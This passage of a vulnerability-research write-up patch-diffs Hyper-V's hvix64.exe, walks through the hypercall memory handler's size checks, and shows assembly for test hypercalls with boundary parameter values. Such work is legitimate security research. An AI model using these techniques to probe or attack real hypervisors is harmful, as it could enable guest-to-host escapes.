<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">which analyses EXIT_REASON</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="345" src="https://lh4.googleusercontent.com/waqHe8-F3ZxfW9v7TMzfTtS2Br9WgU0IJpPdxL6usVL1UragK7lCxWIQffndnlVQ-HoqRnKDNhwlqA29kU-Z1vZI9i4hvPR4w9aY6O9RpRdEotB2boUUliVddvKr5LTiEw5Zp1APaO7UA4xKeQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="257" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we see check if VM_EXIT reason is VMCALL instruction</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="85" src="https://lh5.googleusercontent.com/HJX8aeKIHxIWczp8D831IhYJo4-0OMZpK831mdiFqIPXGDQRdNMxSLhkIrjIHfd8ZGlzHiWmIsrUtzInpCJyuKXoa3p417Yf24Cbf8QMN0oCRICHqZxVmutr2JFeW096DeHSlBXNDyy5bRTavw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="221" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we see checks:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols'; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.400000000000006pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">is code execute in ring3 or ring0;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols'; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.400000000000006pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">comparing hypercall code with 0x8D (max value for Windows Server 2012 – 0x8С);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols'; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.400000000000006pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">processor working mode – x86 or long mode (x64);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols'; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.400000000000006pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">method of getting parameters: using registers (fast bit = 1) or through memory.</span></div>
</li>
</ul>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="223" src="https://lh6.googleusercontent.com/2EEu1aQj-X12lCTtSCZPUVk9TYSVkK95GFYWVUOlbMUAttfig-f7pMlAhfxjGR5go-XPmy0LwzXsqlOmejbobrqs1Bn7HtlUY0z5WqBADK1ukA5gcAk3BsB6SJ5xsr1rAMjVeprvumRa6nmL7Q" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="415" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mHandle64VmcallReg – fast call handler, mHandle64VmcallMemory – handler hypercall with parameters in memory.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Ok, we define some of functions, which executes before vmcall handlers are called. Compare two hvix64.exe in bindiff: (we see not so many unmatched functions – it was called mUmatchedSub<№>)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="25" src="https://lh5.googleusercontent.com/StiA7T0MF_dSFnY8p3GEyajxEL_qofBjcvR60IbP-fPjOl-Rw3_SL5sYaHzFkR-VZURqjfIZDzY740p-Grw3xVduDyMOCgSGaRAMWiqTBwYOHy0ducbn8Po9Mt4vuDAPZ8cbZJWG_RkF9HDJZQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">See changes in mHandle64VmcallMemory (left – original, right – bug fixed version)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="543" src="https://lh6.googleusercontent.com/Se1VKBCck1OMxlZ5hqnATObUC77f2pkbcSOiWM1-s1a11C0o7sKESwzHThIx5AdvZpqLGfb-X4BclsyMbYKVFIjMu0KjY4v0inv7P1NWG6HXeezPGLXNlf4GvI_AbyDPJRABihL_1EBCUYj6-g" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">See mHandle64bVMCallMemory more detailed:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Pointer to mVmcallHandlersTable, which contains parameters for all hypercalls, is loaded in r9. This table consists of 0x8C structures (which are called “</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvcall entries</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">” on some screenshots), every of which consists of 8 2-bytes elements. 3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 6.6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">th</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> to 6</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 6.6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">th</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> elements are actively used in mHandle64bVMCallMemory function for checking size of hypercall’s input and hypercall’s output parameters.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="285" src="https://lh3.googleusercontent.com/-4GXW-a5woVPz6qoUE2PJXKuMUACXMB-u6OJQz2gYLpNKx-OM_8t3VIeveFqAY2VXKLCQYfs5_BiAy-YBUu4TwEz81jkm5TT_BPWlC8sgevU_HXV6AtdE34YUWlL-a6qWZYDjYA9llOLgYNVlA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, hypervisor checks </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep id</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> parameter of guest OS hypercall. Rep id – is type of hypercall (simple or repeatable). It coincides with </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep call</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> value in table Appendix B: Hypercall Code Reference in Hypervisor TLFS 3.0a.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="127" src="https://lh6.googleusercontent.com/RDtVT2qxV7vK9fZ9JsmPyICoeamjTvwh1o8Vy_Gex544T2EVLpLQnx3sc3DbZC7fYzMaoS8u6gL9i0dgyENc3XPNo3IU_w46sNnLdKx4h5e7RMHF0fNTYQ_cCoznSca5Q91alZ6rP0xbXBJWGg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="463" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Depending on </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep id</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> value mHandle64bVMCallMemory function breaks up 2 big blocks. We see part of function, which is called with condition </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep id</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> = 0, because we see in bindiff that this function part was changed bigger, then other parts of code.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="116" src="https://lh4.googleusercontent.com/2W7FlqgPm4BwD0lP3lRK9yHEFCmJNWKhJSZI_cuoLPO4zNndp3KR_TX8Zcp_Gun9xQKh8geU9WlFGnoLjnK29lcY5x96tggDwpRzRlPcFHkFwmbEnTb2FDHgkJdo9U3PlhDXsdOgPbwYTw6GIg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="446" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, hypercall checks if </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep start index</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> or </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep count</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> exist.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Notes:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Input_gpa = hypercall input value</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">output_gpa = hypercall output value</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then size of </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">parameter is checked.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="81" src="https://lh6.googleusercontent.com/xVa0WInAqtsmHWJWvqGO0TKTy2WcT_55SftDJbrFU_OYPvPPVPt411gf8WuIFvapDoE44ruOmnrzSQ8e8BZ_yP8MR1ECccsLFCv_BtRfy67ez1HyTRZseE2Ym6VilXXb3Rh2F1xjhgrkI5gnEA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="459" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="81" src="https://lh4.googleusercontent.com/8g_HbLOk7Sxp8_PIJr0DGI7H0e0fhIYL0DxO9kNC-3S-KQklizG3cbUoemQqjrxNhgZQ_-Uhvtuzgc_bZ5CfRA2nLsKErMGXIEINwjjNpQO29S90toQjLubQoFMdqrAUiutgHEvfT0Os-kcdgQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="383" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="122" src="https://lh6.googleusercontent.com/erdU3JtD7C0DsNnVBoswte-OViJnLYXTT1kmoqxaALgQCwPqsCzi7iGsRZfgAfZZ1NKIPqFcvBbZ8AvezW65yJ7_JwarFy2ncM-JF2m9aBUMasuICC7KyUm-2x70kVU6xf9au_Ohg-5FeOc8aA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="433" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, same check for </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">output_gpa. </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, 3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 6.6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">th</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> element of corresponding </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvcall entry</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> from mVmcallHandlersTable table is checked.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="52" src="https://lh6.googleusercontent.com/zdXI0tK8iyqXIV5j5eqpYmK-rSY2DTRXWpb-1BUfKj16zLXZFzJ4DjFj8BVg0W1U7eQsdnp36H_s0xHVf4q9Lx2olbAfcKoRhnmxWn3_vVyS3j8WJJIT3U_ynlVCDfUjMyGqlBjF9ZCKC73I_A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="400" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="119" src="https://lh3.googleusercontent.com/MfA3bY8ufpgCLuvSFgL06NrjBzJpLmBxyVwI54cd2IrFKhvYhC5oLWqnR_YQV6TPp3j2kvzIqCXKRJ0wbiFgjatKH2zRTp53RTJQa6isWyRXAFWbjFRFX3KbsfuVBOACQVEL9KyagshF6Cj-Ww" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> size is less or equals 40 bits, then corresponding hypercall handler from mVmcallHandlersTable will be called. We can conclude, that hypervisor differently handles </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">output_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> with different size (1..40, or 41..52, or 53..64 main significant bit – we have 3 size ranges). Try to construct hypercall, which can pass all checks (without fast bit and with 3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 6.6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">th</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> hvcall entry element which is not 0) with </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">output_gpa </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">values in every of these 3 intervals (I set boundary and middle values). I test it for HvCreatePort hypercall.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 1..40 (min value):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 1..40 (middle value):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFEh</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> FFFFFFh</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
